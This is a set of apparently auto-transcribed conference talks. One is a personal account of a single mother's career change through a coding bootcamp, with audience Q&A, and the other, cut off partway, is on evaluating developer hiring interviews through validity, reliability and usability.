they were tracking data it was agonizing for me I like wanted to cry I may have cried at seeing how awful the situation was in the nonprofit sector and their tech capacity they had this shelter that I was working at had a dial-up modem like that kind of dial-up modem on one computer that's all they had for the whole company and so none of the social workers had computers to track data for clients everything was written on paper and like literally they had someone in a van driving between the different locations to pick up these binders and transport them and then do more of this business sorry that business and the paper and it was it was painful so I wrote grants and I got them computers and I built them a VPN and I built them a server and I built them a website and it's in three languages because they have a lot of clients who speak different languages and I did all that and it felt really good and I got paid shit but it felt really good and I felt like I was making a really big difference and and then the getting paid shit thing became a little bit of a problem because I became a mom I decided to adopt my son June 2008 and and he if I hadn't done that work I would have had a hard time adopting him because I learned a lot in my work that has made me a better mom but he was a big part of my daily life obviously as mom and was coming with me to work this is me carrying him during the walk against rape because I worked for women against rape and and so but then you know things started settling with me being a mom and I this whole time I've gotten the back of my head like this I'm still gonna I'm still going back to programming I just you know just not yet not yet you know and so then after things settled that being mom I started getting this seed planted of an idea that I was gonna take that step and go back maybe go to grad school maybe do something to really solidify those skills and and get back on track because you know I got a little you get a little rusty with time and I continued volunteering on the side and building websites on the side for a bunch of different nonprofits but they weren't I wasn't I wasn't doing engineering and I wasn't building dynamic websites because they couldn't maintain them so I was just building static HTML and teaching them how to how to do them on their own so I'm like making that step starting to think about it again and then I had my daughter so now I'm still a single mom and I've got two kids and boy is that getting paid shit part starting to bite me in the ass at this point and and so this is 2011 and she also is coming with me to work she came with me to work for eight months I carried her and wore her my colleagues carried her and she was there outreach materials permanently our marketing prison and so then 13 years later after my oh you know after a little while it'll pick up 13 years later I'm having dinner with a friend of mine and she says hey have you heard of boot camps there these my friends started this really cool boot camp where you go and it's like 18 weeks and you learn how to be a software engineer and then you get hired afterwards and people make like eighty five hundred thousand dollars I know someone who made 125,000 out the gate and it's like that sounds like bullshit and and it's ended kind of crazy to me but I looked into it a little bit and so then I read on the website you know most people spending 12 hours a day six days a week and the place was like that also sounds like bullshit as a single parent that's really that sounds 
impossible right and then I look at the cost and and this is basically what I thought of all of it and this is impossible it's insane there's no way I can budget it there's no way I can justify that much time away from my kids there's just no way like everything's just no way but I'm stubborn I'm really stubborn and so I decided what would it be like to sit with that impossibility that sense of impossibility and that I can't do it and what would it be like to just try and take time and be calculated about it and try to make it work and find the money and find the community and resources and so I jumped and I decided to quit my job December 2014 I applied to Dev Boot Camp and in January I was accepted and I resigned from my job I decided I wasn't going to do the halfway I'm gonna work part-time and do they have a period that's called phase zero for nine weeks where you're working remotely and most people work so keep working their jobs until then and I was just like no because I knew that in order for me to be successful I wasn't gonna be able to do the commitment that everyone else is gonna be able to do on-site where they're most of my cohort basically lived at Dev Boot Camp don't tell anyone because you're not supposed to sleep there but people do and I couldn't I had to leave every day and I had to go home and still take care of my kids but so February I got started there were a lot of risks involved around like couldn't do the full hours not guaranteed a job offer and going back to my previous career would have been possible because I was the director and I had a lot of respect in the community but but it would have been it would have been a conversation for sure like why did you have this gaping hole in your resume I was trying to change careers but decided to come back you know people in the nonprofit sector are very concerned about long-term commitment of their staff and so that would have looked really bad so a lot of risk involves and so self-care was a huge thing for me during this process it was really important that and part of that self-care was setting those boundaries and saying you know no I'm going to go home at six o'clock I'm going to read my children their bedtime stories I'm going to tuck them in at night and then I'm gonna keep going but I'm also not going to stay up all night long coding I'm gonna cut it off at 10 o'clock because I write shitty code when I'm tired and I actually write pretty good code pretty fast when I'm well rested so what I would be macking my head against for two hours at night late at night I do in five minutes the next morning so that was part of my self-care process and I asked a million questions a million I can't even fathom the amount of questions that I asked because if I tried to pretend that I knew shit I would get nowhere and if I just put myself out there and kept asking and asking and exposing my ignorance a million times a day I would make progress and I also felt like it was really critical for me to be a mentor because even though I knew nothing I knew a little bit more than the people coming behind me and so every phase of of the boot camp I was mentoring someone else and when I finished the boot camp I became a mentor at hackathon and I taught classes at woman who code I think that's where I taught it and kept teaching people and rockets so one of the other strategies I that really helped me be successful was they had they have all these coding challenges in the boot camps right and so you're supposed to go through and do all of 
them. Well, that was impossible — I simply did not have the time — so I would just jump straight to the hardest thing that they had, and I would just dig in deep with that, and it served me really well, and it was so fun. And so staying really closely connected to my sense of joy around coding, and not letting it be this painful process, was also a really big part of me being able to be successful with it. And I was all about celebrating my failures, because I knew when I was failing I had some shit to learn, and it was amazing. So any time I couldn't get a test to pass, or any time that I didn't know the answer, I was just like, yes, I've hit a place where I can move through, and I've identified it, and now I can learn and overcome, and then hit the next failure, and it's gonna be beautiful. So yeah, if you're ever in a situation where everyone around you is having success and they're high-fiving each other, I totally encourage you to turn around to the people you're failing with and high-five, like, yes, we're failing and we are going to get through it and learn — so celebrate that learning process. So I finished the bootcamp, and it was time, and this was June 2015 — which, I don't know if the last speaker is here, but the last speaker was talking about when the Supreme Court decision was handed down for gay marriage rights; that happened that weekend, it was amazing, so we got to celebrate. And so interviewing was this whole other place, right? Because I had gone through this program and I needed to get on my feet, and interviewing in the tech industry had changed drastically from when I was in it before. Before, you'd just get hired on as a contractor, basically, and it was a temporary contract, and if it went well you'd get hired on full-time, and if it didn't, you'd move on, and it was kind of a mutual thing — and there was no whiteboarding, ever. But this really awesome strategy that I had in my head was: I would bring the whole weight of feeding and housing my children to the interview, in my head. It was great — I was so stressed that I couldn't think about anything. People would ask me these basic questions and the information was absolutely in my head and I could not get it out. And then there were times when I actually had managed to get it out, and there was this one guy — he had a stack of papers, right, with rows and rows of notes on the paper, and he says you're amazing, and goes on and on about how amazing I am — and didn't hire me. And so I started to also get this feeling that my assessment of situations was warped — like, I would think that things are going well, and they weren't. And so it just went back into this space of determination, but feeling a little loss of hope. And I was in this place where, often, when I was losing hope, that weight of taking care of my children became heavier — and this happened in my mind all the time. So what I did was, I needed to turn back to community, I needed to stay rooted. This is my cohort that I went through Dev Bootcamp with, and I turned back to them and was just like, y'all, I'm struggling — I'm not just struggling, I'm struggling emotionally, like, I'm spiraling, I need to get grounded and I need help. So I started checking in with a group of people weekly, and they were phenomenal in supporting me. And then soon after that I got this awesome breakthrough: I got an interview with Omada. And this was the interview, and it was the most amazing interview ever — we paired for the day on a story that was in the
backlog and that went into production that day and it was just so much fun it was a pleasure to work with them on this story and it was like even if I don't get the job that was just a really reaffirming experience of just getting to code with people and and I had met Lily through Rails bridge and she connected me with the interview and I began being a software engineering intern with them and so that was September 2015 and and again lots of risk and I turned down a couple of full-time positions with other companies to take this internship and it was banking on the notion that this team is amazing and this company is doing amazing work and gonna learn so much more as an intern in this program with mentorship and guidance and pairing than I will going into this full-time position with this other company where their mentorships seemed a little more shaky maybe not as solid as Mata's was and but again not guaranteed a job didn't have health benefits I was still was still taking more risks and so I asked again a million questions what does this give us like why are you doing this this way and you know I hear what you're saying but I have no idea what you're saying what it means on a more fundamental level like you're going through a process sure I hear you but what is what is the underlying code mean and I noticed this thing breaks the build randomly is there another way we could approach this haven't tested a situation like this before what do I need to consider like these are all you know I it's just a consistent pattern I've had in my life of exposing ignorance and and in order to move forward at a more rapid pace and you write the most scalable well-tested object oriented software in the world said nobody ever because that's not my goal that would be ridiculous for me to ever expect but it's one of those things we're like you want you want to hear that and but it's letting go of that ego and letting go of your expectations and accepting that really the best compliment I could have ever gotten from the team was that you asked the best questions of any in turn we've ever had because that means that I'm going in the right direction and and there was a solo project that I did during this internship where where so the team pairs and we have an agile process does anyone not know what those two things mean awesome so with a solo project you go off on your own you're not pairing for months and again I went through this a similar kind of feeling that I was getting during the interviewing process where I was feeling isolated and alone and disconnected from the team so I decided to start pairing like so going next to a pair like the pair would be here and I'd be like just sitting near them and I implemented my strategies that I needed to feel connected and and be able to feel like I was part of the team and they've learned so much during that month and then it was time to come back to pairing and as a junior developer it's so easy when you're pairing to just let the other person drive all the time because they're fast and they know what's going on and they don't have any questions they're not nearly as many questions as I do and and so my co-worker had this amazing idea she brought me some toys she was like give these to people you're pairing with and so that way they would step back and would keep their hands busy while I was able to take the initiative to step forward and drive and this is how I feel about my team they're a really really incredible team is my thing not showing how long has it been 
not showing? I'm, like, looking at this screen and seeing — awesome, can you fix that while I do this? All right. Oh, thanks, you guys are great. Cool. Well, I really love my team. This is a really great picture of them, and we're all celebrating together, and maybe you'll get to see it — and I can't say thanks, I'm a little lost. And, oh — so soon after, in January, I got hired on permanently as a software engineer with Omada. Yeah, it was very, very exciting and hard-won. But I must keep looking through, because it helps me know where I'm going. And now I'm part of this much larger, amazing team of about 40 or 50 engineers — I don't know, maybe making shit up, around 40. Yeah, Lily's one of the amazing engineers on my team. And my kids and I celebrated. And it's funny, because I asked my son, you know, if you could describe what I went through with changing my career to somebody, what would you say? And he was like, you're really stressed out, Mom. And that's kind of one of the — I think they bore the brunt of that process. And my mind still goes blank, and I'm still ignorant, and I just want to encourage you, when you hit a point where you feel like you can't do something, to just — I really love Ms. Frizzle, I don't know if you guys like The Magic School Bus, it's a pretty awesome show, you should watch it even without children — there we go — so I just want to encourage you to take chances and get messy. And I still want to show you a picture, and that's it, you guys. Any questions? Yeah — you know, one thing that Omada and Dev Bootcamp both did that made a world of difference for me was being flexible with my time. So, for example, most of the team leaves at 6 and I leave at 4:45. I also get in earlier than anybody else — usually when I get in, the only people there are the chief architect and the CEO. And allowing me to do that — it means I solo a lot in the mornings, but it's really great for me to be able to do that, because I can sit there, I can pick up a story, and I can dig into the code and read, so that when my pair comes in I'm more able to just kind of jump in. And then Omada also has great health benefits for kids — like, it's actually not that expensive for me to insure my children, which is great; in the nonprofit sector I always had to pay, like, full price, because it was really expensive to insure them. So there was that. I'm sure you guys do lots of other things — oh, I mean, the team's just really supportive. There are times when I am struggling with something at home, and I can talk to my colleagues and team members about what's going on and get their support, and they're not just like, oh my god, she's talking about her children. And actually, I'm not the only parent on the team — there are two other parents on my direct team, so there's a lot of empathy. Yeah — um, so there's a few questions in there, so I'm gonna hit them one at a time. So, when you asked about the salary and how true I felt that to be: I got hired on within the range that they said to expect — I think the people who — it means — you sneeze — okay, cool — and so the higher end of the range, where my friend was like, I know people who've been hired on at 125 — usually those are people that already have tech backgrounds, maybe in a different aspect of it like UX or design or something, and they're kind of expanding their skill set, but aren't brand new to it. So, yeah. Um, otherwise you asked a bunch of questions — what were the other questions? The time commitment for the program? Yeah, people
won't weigh beyond the time commitment that they said to make I couldn't do it so I just I did not do the time commitment that they tell you you need to and I told them ahead of time like this is what I can do can I come through the program and they're like you can try like me as well sign up like we're not gonna stop you but it's gonna be hard and it was yeah imposter syndrome like what you talked about the imposter syndrome what helped you get through that I'm feeling that like right now yeah imposter syndrome's a bitch and so I don't think I got through it the first time I think I succumbed to it and I left and I didn't put the amount of effort that I could have to keep going and I think part of it was because I was really inspired but by what I was distracting myself with and that felt really powerful to me and healing in a lot of ways but part of it was also because I was like oh well there are all these people I know who are way more awesome than I am who have been hired on and or who can't get work so I wasn't trying as hard as I probably could have but then this time I think this time I just said fuck it this time I said I really kept the mentality of I love this this is something that I was really passionate about and had so much fun doing and and I remember my colleagues back then and they didn't know anything either like they were learning as they went to and a lot of them had CS degrees but they I feel like there are a wide range of skills that you need to be an engineer and some people are seriously lacking and being able to interact with people and that makes you a really bad engineer and then there are some people who may not have like the fastest typing and the most you know the ability to very quickly come to a solution about a problem but but you have the ability to look at the bigger picture and and think about the team as a whole in ways that maybe someone else can't and I think you just have to really appreciate yourself for your skills that you have and recognize that code is code and you can learn it and it's and it's hard and everybody struggles everyone hits their head against stuff I have senior engineers on my team right now that sometimes take a couple days to figure out a solution to a problem because it's complex and so do I and that's okay and just keep asking a lot of questions and if that answer your question really quickly I've been doing this for almost 20 years and I still start with that they made me the manager of my team and I think part of it is each thing that you pick up is a new challenge a new ticket you don't know how you're gonna solve it until you solve it and you just have to keep that in mind and kind of just say you know effort like you say I'm just gonna try and I almost always figure it out and if I don't ask for help so you know thank you but my question was about the bootcamp itself do you feel like that does that give you enough to to to be able to take on the job that you have now and and not not not get not be too lost you know what I mean too lost too lost you know I mean sometimes you can try to solve a problem and it's like actually looks like there's five problems in this one problem and I'm not sure where even they get start you know I don't know I mean it maybe this is part of my bias for doing it for a long time because I think it takes a while to just learn how to solve the problems but you know I'm trying to get into my head how useful are these boot camps um I I guess I disagree I feel like learning how to ask questions 
learning how to follow the clues that you see in front of you reading errors and paying attention to the details I don't think it takes that long to learn that and I feel like it is something you can pick up quickly I I felt like the camp was amazing I learned I learned how to learn and I learned how to let go of any ego and I learned how to be humble and audacious at the same time and believe in myself and and not see something as too hard to overcome and like you know fairly early on probably when the first weeks I was there they were like hey here's where the gems are when you install when like when you build rails these is this is where the gems are go open them read the source code like just go through and just read thousands of lines of code a day read a thousand lines of code a day go through read a hundred pages a thousand pages in a book a day like just go through and just consume what you can and eventually you'll see patterns and that's what code is looking for a lot of it's just looking for patterns and and how far I don't want to go over my time it's 206 I'm over time aren't I now how much time do I have five minutes thank you and and so learn yeah I feel like that's what the boot camps do they teach you how to learn and you can they pick a language but you can apply that same process to any language and pick it up so that's I feel like what boot camp rivers are really really good at is just like jumping in and I'm learning something quickly and you had a question sure so you're like maybe not an expert at being in engineering but you're an expert at being a mother so what's one thing that's easier for you as an engineer because you've been a mother I would never say I'm an expert at being a mother and yeah no I feel like I honestly would never ever in my life call myself an expert at anything because that would mean that I have hit the end of my learning process and I will never get there on anything because I'm always going to be learning and trying to be a better person but to your question about what about parenting has informed me as an engineer I mean I think there are a lot of things I guess being like it's funny someone mentioned something about like healthy relationships and how giving people specific positive feedback is actually a strategy for people for couples that last a long time I'm single what do I know but but but it's that's a strategy I've used as a supervisor so used to be a director so I used to have a whole huge team of like 125 people that I supervised and so that as a supervisor as a parent as a teammate you know on my current team that is something that's always served me very well giving people very specific and positive feedback not just like you're great to pair with but I really appreciate when you I really enjoyed how you wrote the test and I made the test pass so I really enjoyed how you had me rate the test and then you made the test pass and and so giving specific getting really specific about that has been has served me well and one example I was curious if when your interview process if you faced any sort of age discrimination did you face people asking you about your age or did you face anything like that and if so how did you how did you address it I'm not sure if you're assuming that I'm younger old you look really young but I know you've got a couple of kids yeah I mean I guess I am one of the older people on my team I'm 37 I I don't think I faced age discrimination maybe I did and I wasn't aware of it I don't know that I think I think 
more than anything I don't know that it was I don't know that it was directed discrimination it's more the process of interviewing right now is is is not optimal I think that the process and actually you were describing it sir I don't remember your name we were talking about this earlier today he was describing an interview process that his company does and I went through a similar interview and it was awful it was the most anxiety-ridden interview I've ever had I was not able to communicate my knowledge barely at all because I felt like I was just being hammered and it was more like an interrogation than an interview one guy literally cut me off like every question he would ask me I would answer and he cut me off while I was talking and he hammered me with another question and then as I was answering that one he cut me off and hammered me with the next one and and that's just a really shitty way to interact with people that's just not very humane or kind and honestly I left that interview being like I don't want to work for your company even if you make me an offer because I don't want to work with people who are gonna interact with me like that I don't want to work with team members who might be cutting me off and moving us along in that way I feel like there are much more there are much better ways to to be so I would just encourage people to examine your interviewing strategies and what those strategies are serving like what purpose they're serving and and I would and how they are leading you towards your goals and how you want to build your team yeah okay thank you
|
At the beginning of 2015 I was a Director in the non-profit sector, 13 years into my career. My days revolved around crisis intervention and violence prevention. I kept people alive and was well respected in my field. A mom of two, flying solo, people thought I was brave, stubborn... and a little insane... to step out on the ledge of career change. Come on out on the ledge and humble yourself with me. It'll make you a better engineer.
|
10.5446/31519 (DOI)
|
Thanks for showing up. I'm excited. This is my first, like, AM talk where people aren't, like, hungover. And so I'm super stoked that all of you are awake. Presumably awake. I'm told there's a lot of jet lag if you're coming all the way from Seattle. But hopefully that will work. My name is Joe Mastey, and let's talk a little bit about hiring developers. So I am a consultant. I work on a lot of things with companies, but I tend to work with them on their onboarding, their hiring processes, working with apprenticeships and stuff. And one of the things that I've noticed, both with companies that work with me and some that maybe should, is that we have a problem with hiring. And this is a big issue, right? How many of you have, at your job, a job posting that you cannot fill for a developer? Right? There's a lot of us. It's a big deal. And these are not, in a lot of cases — this is not just, like, oh, hey, we could use an extra person on the team. This is, like, an exigent threat to your business. This is a big deal. And interviewing is hard. Another show of hands — I like show-of-hands stuff. How many of you have received a terrible interview? Has anyone ever attended one? Yeah — so you go in and, like, they just don't have their shit together. Does anyone want to cop to ever having given a terrible interview? Okay, I have. Good. I was hoping that somebody would actually, you know, cop to that. And I think that this is funny because, you know, even big companies — you think about, like, the Googles and the Facebooks and all these companies that have, you know, 10,000 developers — they're not actually doing better. Their interviews are just as terrible as the rest of ours. And that, to me, points to the fact that interviewing is, in fact, difficult. It's expensive. Anybody that you have on your interview team also has a full-time job, right? So these engineers, who you expect to take hours and hours out of their day, also have a complete set of tasks to deliver. Also on the candidate side: anybody who is applying for your job may also have another day job. They probably have other things going on in their life, right? And if you think that that's not your concern, remember that the candidates that you really want to hire are the ones that probably already have a job and other places where they're applying. So if you give somebody, you know, 100-hour homework, they're just going to move on, right? And I think that we're making it ultimately worse on ourselves. We're not really doing ourselves any favors. My informal sense of how we tend to come up with an interview is "how did I get hired," right? So, I've been interviewed in a bunch of different ways — that one seemed kind of cool, maybe we'll do that one, or maybe we'll try something else. So it doesn't do us any favors whatsoever. And I'll tell you now, there is no perfect interview. So we're going to talk through a lot of things that make interviews better or worse, but there is no correct, per se, answer. I will say that there are a lot of bad answers. And the bad answers are the ones that, in large part, we're doing right now. And the result of that — clicker doesn't work... yes — is that this happens. So this is one of the main contentions I'm going to make to you. I wanted to put it in early because I want you to think about this. The reason that our interviews are bad is typically that we are not measuring what we think we are. All right? When you have a bad interview, when you have, you know, puzzles, when you have abrasive interviewers, you're not measuring the candidate.
You're measuring the interviewer. And the entire point of the interview, obviously, is to see whether that candidate is good. And so this is ultimately why you end up turning down good candidates. This is ultimately why you end up accepting bad candidates. This is why you have 200 interviews and never offer anybody a job. It's because you're not measuring. And I don't think that this is on purpose, right? Nobody's bad on purpose. What's happening is that we don't have a tool set. We don't have a mental schema for how to evaluate if our interviews are any good. We tend to be engineering types. We're not coming from an HR background. And so usually it's that made it up. So good news, even if we have not invented correct ways to do interviewing, there are other fields that have, specifically ones that have been around a lot longer than we have, psychology. And what I want to talk about today is industrial and organizational psychology. So this is one of the major branches of psychology. It started in the 1800s, late 1800s. It really came to prominence in the 1920s, which is during the First World War, what happened was psychologists in the Army needed to figure out where to place a million recruits, literally one million recruits. And so they needed to come up with a way to handle that process. And so they started to codify what they call selection. So I'm going to include, at the end of this, there's all the references and there's a lot that you can look up. If you do find yourself wanting to look at primary material, selection is the name of the concept that you want to Google. Cool? And so it's going to be a little bit tough for me to cover 100 plus years of psychology. Unfortunately, they have written a lot over the course of five generations, as it turns out. But so what I want to do instead is I'm going to give you a tool in three parts, a way to think about the interviews that you're doing. And then we're going to cover a couple of the common kind of tropes, the things that we tend to see in interviews, and look at them through that lens. Cool? I like you. So number one is validity. So if we have something we want to measure, if we have a construct, is what we call this in psychology, validity tells us whether our measurement measures that thing. Right? These bullets do not, they're bullets, I promise, do not very closely line to each other, but they are all centered approximately on the bull's eye. That's validity. It's okay that they're spread out. It's okay that in fact most of them are wrong because they are measuring the correct concept. And there's a couple different factors to validity, things that I want to consider while we're here. One of them, one type of validity, is the question of whether the thing, the question that you ask corresponds to the concept you want to test. And so if, let's say I wanted to test whether you know arithmetic, if I ask you to list off the digits of pi, is that a test of your arithmetic abilities? No. Right? If I ask you to do five plus five, may not be a great question, but it is in fact arithmetic. Right? And the second type of validity that I want to talk about is a sort of wider one. Given that I can test your arithmetic, does that correspond to a skill that I need you to have? I can test your arithmetic, but if the job that I'm trying to hire you for is carpenter, is that actually a valid skill for the job? So it's called external validity, is the name of that one. 
And you'll notice that all the concepts of validity talk about a construct that you want to test. You have to know what the bull's eye is. And so this is actually our first wrinkle when we come to hiring a developer. Because as it turns out, we probably do not agree on what makes a good developer. There's a lot of complication to our field. And so as it turns out, it's very difficult for us to say what success even is in this sense. So think about what a great developer would be in your terms. Right? Hopefully it doesn't look like this. Maybe, maybe not. But what it probably does look like is people that you know, or people on your team, who have been very successful. And you think about a bunch of characteristics of those people who you've seen who are successful, and you kind of generalize and say, okay, that's a good developer. But that is not a real concept of good developer. What that is is kind of a bag of characteristics. Some of them may actually relate really well to whether somebody's a good developer. Some of them may not at all. And so one of the things that happens is when we start to measure people based on what we've seen from success, we end up measuring all these things that we didn't intend to, and we get that. And we get more of that. And that's what our entire team becomes. Reliability is concept number two. So if validity is whether we're centered on the bullseye, reliability is how close our measurements are to each other. So in this case, we don't even care if it's centered as long as the measurement comes out the same. So just like validity, there are a couple different concepts in here. One of the big ones that's really important in technical interviewing is that if I give you an interview and if somebody else gives you that same interview, you should get the same score. If you don't get the same score, you're not measuring the candidate, you're measuring the interview. Right? That includes if I interview you and then another day I were to interview you but I'm pissed off. These things should not impact our measurements, but they do. That's called inter-rater reliability. A second one is if I take an interview once and if I take that interview a second time, I should get the same score. This is called test-retest reliability. And what that means is that if there's an element of chance, if there's an element of did I happen to follow the one path or the other path and it totally changes my score, again, I have not measured me, I've measured the instrument or I've measured the random chance that I took A instead of B and we're hiring on a dice roll. Right? And then the third type of reliability, we're not going to see a ton of this, but if I were to have multiple questions, those questions need to yield the same result. So if you go back to our arithmetic example, if I ask you what's five times five, thank you, some of you know arithmetic. What's eight times eight? Thank you. What's 265 times 12? Nobody. Clearly, you don't know arithmetic. Right? It's the same form of question, but what happens is we have these questions where there's some other confounding variable. In this case, we've all memorized a very particular set of multiplications and we're not actually doing them in our head, we're just doing them by row. This happens all the time in interviewing. We measure a construct that some people have memorized and other people have not. And all those concepts of reliability, I think there's an interesting one, point towards approximately the same thing. 
They point towards consistency. So we're not going to belabor this in the rest of the talk, but I want to say that if you give the same interview, if you give it the same way, if people have a scoring rubric so that it doesn't matter who's there, what matters is how you do. If that scoring feedback is objective, you will tend to be reliable. So reliability, consistency, I'll say consistency breeds reliability. So number three, usability. I held up two fingers for three. We could probably come up with a valid, reliable interview for developers and what it would look like is having you do one of everything. If I were to do this in my arithmetic, I would just ask you one of every single question. But of course this doesn't work, right? And it's tempting sometimes in our interviews to be able to just smash enough things in that we get that accurate measurement, but of course that doesn't work. It's exhausting, people don't want to go through it. And ultimately what we have is a really limited opportunity to take measurements from people. So we need to be really careful about how our usability works. And this differs between company to company. So one of the things that's really tragic about stealing the Google interview, if you take Google's interview and use it for yourself, they can abuse their candidates and people still want to go work for Google, right? It's true. It's kind of a shitty process. But it works for them because people don't drop out. That probably doesn't work for you. And this is different between candidates as well. So imagine we give homework, let's say it's a 20-hour homework, right? It's something that takes a bunch of time. Some candidates, if you don't have a job, let's say you just graduated a boot camp, let's say that you just left your job, fantastic, no problem. If you're somebody who has a real job or got help, if you're somebody who has a family, if you have other commitments, if you've ever had a medical issue, this is now what you're measuring. You didn't mean to measure that. You didn't mean to just exclude anybody who had ever had a family, but that's what's happening. So we need to keep usability in mind. And so to throw a couple other confounding factors, your target probably does not look like this. Or in reality, nobody's target looks like this. But your target looks like something else. And that is because your requirements, the things that you do, the constructs you need to measure are different for you than they are for everybody else, right? And so you cannot just take somebody else's interview. And when you're thinking about these interviews, you can't simply say, okay, we'll just maximize one dimension, right? I can tell you approximately how valid different types of interviews are. But you have to balance that against the other factors. You need to say, should I trade off validity for reliability? Because the correct answer is often yes. And then in reality, bringing back to the usability, we get this kind of thing. Three concepts, pick two-ish, probably really pick like one and a half. So there is no perfect interview. You're not going to get something that is off to the top right here. You're going to get something that's messy and dirty. And what that means is that the only way for you to tell if that interview works is to test your interview. You must test your interviews. And what that looks like, if you have an existing team, this is actually nice, you can give your interview to your existing team, assuming you like them. 
If you don't like them, just invert the results. But assuming you like them, you can give the interview to your own team. But that's also not good enough. And this is why it's so hard to do stuff like measurement. Because if you had, let's say that you managed to come up with a team that's all right-handed, if you used to now create an interview that happens to be very difficult to complete with your left hand, your entire team will succeed. We are accurate and valid in all those things. But again, we've managed to measure something we don't intend to. So you need to go out and you need to test your interview against people who are not part of your existing team and who are not part of the kind of experience and demographics of your existing team. Cool? All right. Let's figure out how to use these tools. I don't know if that's an ax or a hammer, but it's probably an ax. So we have the tools, we have reliability, we have validity, and we have usability. Let's talk through the interviews. So I'm going to cheat. This is not part of the interview, but it's my talk and you can't all leave fast enough. So, huh. The interview process really does start back at the job posting. This is good and this is bad. The reason I wanted to bring this in here is because if you, again, if you have, if you accidentally exclude a bunch of people, if your job posting causes nobody with, you know, left-handedness to apply, then nothing you do in the rest of the interview will ever fix that, right? They're not even in your queue. Let's talk about what you need. This is the opportunity. So we talked about constructs and we talked about how you can't just steal them from somebody else. The job posting is an opportunity to think about the things that make somebody successful for your organization. You need to think about what things you actually want to measure. And a good rule of thumb here is that if you're putting it as a real requirement, you should probably actually measure it during the interview. If you have something you're not going to bother to measure it, you probably don't need it. You need to prioritize these things because everybody is different and everybody is flawed. And so in reality, if you have, you know, a list of six things that you really need, pardon me, you probably really only need like four or five of them. And if somebody comes in, you may want to hire them anyway. And then again, going to need versus want, I want somebody who's great at testing, I want somebody who's great at refactoring, I want somebody who can scale my services and who can scale everything and scale buildings, but I don't need that. And so remember that many people have been socialized not to apply for jobs that they don't qualify for. So the more you put on the need, the more you exclude people. I happen not to agree with applying for jobs you don't qualify for, but that is the reality of what it is. What are you asking for? The actual text of your posting is really relevant. Have any of you ever declined to apply for a job or discontinued applying for a job? Because you saw a posting that wanted like some variation of the Ninja unicorn Jedi, right? Is anybody, so I have neglected to apply for places just not interested, right? Do you think that they meant to exclude me? No. I'm a ninja. Yeah. But the reality is that that happens. And so the words that you use, what you actually ask for matters. In the resources, I'm going to point to two different things, two resources that I like to use for this. 
One of them is called Textio. What they do is you put your posting in there and it kind of tells you these are things like these are corporatey words that people tend not to do very well, right? And that can help you. And the other one is called JobLint. And so that's one where again, if you've got these kind of ninja rock star, we're going to go crush some code, it can point out a lot of those things to you that you may not have considered in the past. So you need to be careful about what we are asking for. And then we need to think about where we are asking. If the only place that you post your job is Carnegie Mellon, where by the way you are like the 50th most interesting startup, right? Your team is going to reflect precisely one background. It's going to be CMU. That's not good. We need to have a variety of depth. The same thing goes for your network. If your network is relatively homogenous, if you all tend to come from the same place and do the same things, that is not going to create a sufficient candidate for you. You need to think about where you are posting jobs. You need to reach outside of that comfort zone to find more people. And ultimately this is a good thing for your team. It's the initial screen. We get some resumes. Let's talk about the different types of screeners that people tend to get. These are like trivia, I think would be the category you would call this. If you want a litmus test, if you can Google something in 30 seconds or it will take you like 10 seconds in IRB, it's probably a trivia question. So let's think about validity here. In theory, well, maybe not this question so much, but there are questions that are trivia that you could ask that might be valid. The problem is that there's not very much signal. Usually if I ask one thing like what's the name of this method or what's the order of arguments of this method, it's very little data. And what it ends up rewarding, what it ends up measuring instead is recency. Have you dealt with it lately? So a lot of times the way this interview works is that the director or the CTO reads something on Reddit and then they go have a phone interview and they're like, oh, hey, do you know this thing? What is the memory footprint of this string thing? Is that valid to the job? No. A minute ago you didn't know it and you were fine. So this is not real valid criteria. Could it be reliable? If you ask the same question, I think it could be reliable. Do people ask the same trivia question? No. They mostly get it from whatever they were thinking about last. So in practice, this is rarely reliable. Is it usable? Well, one trivia question is very easy. I'll say I think that you could get a more valid version of this by asking like 50 of these. I think that with enough trivia you might be able to get something that resembles a valid question, but then that's not usable. This is not a very good one. Do you know this part of? Very common font screen. This is FizzBuzz. I think FizzBuzz is interesting. So jumping it valid, is it valid? Maybe. There is an aspect to it that says can you write some amount of code? It does suffer from the problem where people tend to study for FizzBuzz. If you are a boot camper, you absolutely are learning to write FizzBuzz code. But it does track some kind of concept. Is it reliable? Yeah, it's probably reliable. I can administer it. I can think about the different types of things that people get right, get wrong, I can score it. Is it usable? Yeah, it's actually pretty usable. 
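For reference, the FizzBuzz screen discussed here is usually some small variation of the exercise below — a minimal Ruby sketch, assuming the standard rules: print the numbers 1 through 100, substituting "Fizz" for multiples of 3, "Buzz" for multiples of 5, and "FizzBuzz" for multiples of both.

# A minimal FizzBuzz sketch (assuming the standard rules), roughly what
# this kind of phone screen expects a candidate to produce in a few minutes.
(1..100).each do |n|
  if n % 15 == 0      # divisible by both 3 and 5
    puts "FizzBuzz"
  elsif n % 3 == 0
    puts "Fizz"
  elsif n % 5 == 0
    puts "Buzz"
  else
    puts n
  end
end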
I think ultimately that's why people use it, is because it's very easy to administer. If we wanted to make this better, we would probably want to change it from one that's really well known. Like I said, everyone knows FizzBuzz. You're looking for a job, learn FizzBuzz code. You've now passed 30% of phone screens. Good work. But I think if we change that, we would have something that's a little more valid. Homework. Who issues homework as part of their hiring process? By which I mean go write some code on your own time and submit it. Fair number of people. I think, again, homework is an interesting one. Homework is super valid. Homework is a work sample test. So in the terminology of IoPsych, probably the most predictive way to look at somebody's work is to have them do the work. As a work sample test. Homework works for this. But it has significant problems. The reliability is an issue here, because what you have is candidates, some of whom can spend 20 hours and some of whom can spend five hours. And if you're grading criteria, don't take this into account. You end up with a really, really different set of scores for people. And you did not intend to measure, again, whether I have commitments at night, but you did. And so the way we can fix that is maybe to put some parameters around it. Hopefully you give them an assignment that's related to your work. It goes to validity. Hopefully you give them an assignment and you say, spend about five hours. Could somebody cheat? They could. But it gets you closer to having an accurate baseline comparison. And hopefully you don't give any homework that is like, please re-implement our whole app or please work on this NP complete problem or this thing that our software architects can't even solve. But show us a working demo. Sometimes we have this tendency to just like, that's a thing I was thinking about. It doesn't work. And then I'm not going to spend a lot of time on this one, but something I've seen a lot of recently is these sort of sites where they promise to give you a score. And so you go there. And I think it's super, super usable because it doesn't take any engineer time. And it may even be reliable because you tend to ask like the one question, right? Or a handful of questions are the same question. But the question of validity comes up here. And I think that this is ultimately where these become problematic is that the questions in their question bank, because they need to be auto gradable and because they need to generate this big volume of them tend to have very little to do with the actual business of building software. Is that fixable? Probably. Have I seen it yet? No. So interview day. A year ago, Carrie Miller gave a talk at RailsConf about hiring. Problem solved. It's actually a really good talk. You should go watch it. And there are a lot of things about the interview day that she covers. The big ones I want to cover right now is really minimizing variance. So anything that differs 